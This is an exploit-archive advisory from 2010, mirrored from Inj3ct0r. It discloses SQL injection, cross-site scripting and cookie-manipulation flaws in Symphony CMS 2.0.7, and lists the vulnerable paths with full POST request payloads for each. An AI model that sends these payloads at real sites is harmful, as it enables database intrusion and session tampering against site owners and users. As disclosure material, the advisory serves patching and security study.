Home / os / win7

Symphony 2.0.7 Multiple Vulnerabilities

Posted on 10 September 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Symphony 2.0.7 Multiple Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>======================================= Symphony 2.0.7 Multiple Vulnerabilities ======================================= Symphony 2.0.7 Multiple Vulnerabilities bug found by Jose Luis Gongora Fernandez (a.k.a) JosS contact: sys-project[at]hotmail.com website: http://www.hack0wn.com/ - download: http://downloads.symphony-cms.com/symphony-package/36030/symphony-2.0.7.zip - CMS: XSLT-powered open source content management system. ~ [SQL] This vulnerability affects /symphony-2.0.7/about/. The POST variable send-email[recipient] is vulnerable. send-email[recipient]=' fields%5Bname%5D=111-222-1933email@address.tst&amp;fields%5Bemail%5D=111-222-1933email@address.tst&amp;fields%5Bsubject%5D=General%20Enquiry&amp;fields%5Bmessage%5D=111-222-1933email@address.tst&amp;send-email%5Brecipient%5D='&amp;send-email%5Bsender-email%5D=fields%5Bemail%5D&amp;send-email%5Bsender-name%5D=fields%5Bname%5D&amp;send-email%5Bsubject%5D=fields%5Bsubject%5D&amp;send-email%5Bbody%5D=fields%5Bmessage%5D%2Cfields%5Bsubject%5D%2Cfields%5Bemail%5D%2Cfields%5Bname%5D&amp;action%5Bsave-message%5D=Send ~ [XSS] This vulnerability affects /symphony-2.0.7/articles/a-primer-to-symphony-2s-default-theme/. The POST variable fields[website] is vulnerable. fields[Bwebsite]=javascript:alert('JosS') fields%5Bauthor%5D=111-222-1933email@address.tst&amp;fields%5Bemail%5D=111-222-1933email@address.tst&amp;fields%5Bwebsite%5D=javascript:alert(418231608845)&amp;fields%5Bcomment%5D=111-222-1933email@address.tst&amp;fields%5Barticle%5D=3&amp;action%5Bsave-comment%5D=Post%20Comment ~ [Cookie Manipulation] This vulnerability affects /symphony-2.0.7/about/. The POST variable send-email[recipient] is vulnerable. send-email%5Brecipient%5D=&lt;meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'&gt; fields%5Bname%5D=111-222-1933email@address.tst&amp;fields%5Bemail%5D=111-222-1933email@address.tst&amp;fields%5Bsubject%5D=General%20Enquiry&amp;fields%5Bmessage%5D=111-222-1933email@address.tst&amp;send-email%5Brecipient%5D=&lt;meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'&gt;&amp;send-email%5Bsender-email%5D=fields%5Bemail%5D&amp;send-email%5Bsender-name%5D=fields%5Bname%5D&amp;send-email%5Bsubject%5D=fields%5Bsubject%5D&amp;send-email%5Bbody%5D=fields%5Bmessage%5D%2Cfields%5Bsubject%5D%2Cfields%5Bemail%5D%2Cfields%5Bname%5D&amp;action%5Bsave-message%5D=Send ------------ Hack0wn Team By: JosS ------------ __h0__ # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-10]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP